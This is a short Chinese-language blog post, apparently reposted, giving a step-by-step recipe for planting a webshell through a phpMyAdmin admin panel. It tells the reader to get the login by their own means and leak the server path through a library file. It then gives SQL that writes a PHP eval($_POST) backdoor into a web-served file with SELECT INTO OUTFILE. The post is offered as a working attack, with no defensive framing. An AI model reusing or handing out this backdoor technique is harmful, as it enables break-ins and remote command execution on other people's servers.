phpMyAdmin 后台拿webshell

来源:互联网 发布:linux 指令ps 编辑:程序博客网 时间:2024/04/30 01:35
(旧的东西 记录下 方便以后xxx..)

1.如何拿到登陆密码. 自己想办法  
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
CREATE TABLE a (cmd text NOT NULL);
INSERT INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
DROP TABLE IF EXISTS a;
----end code---
4.如果没什么意外.对应网站得到webshell    
原创粉丝点击